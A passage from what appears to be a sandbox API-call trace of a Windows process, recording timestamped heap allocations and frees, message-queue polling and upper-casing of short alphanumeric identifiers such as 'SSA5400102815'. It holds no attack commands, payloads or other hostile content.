Flags=0x0, Size=0x10) returned 0x24aa830 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0265.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0265.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.118] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0265.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0265.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0265.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0265.119] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.120] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0265.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0265.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0265.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0265.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0265.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0265.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.123] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0265.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0265.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.124] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.124] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0265.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.124] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0265.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.125] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0265.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0265.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0265.126] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.126] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.127] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0265.130] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0265.130] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0265.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0265.132] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0265.132] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0265.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.132] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0265.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0265.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.132] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.133] 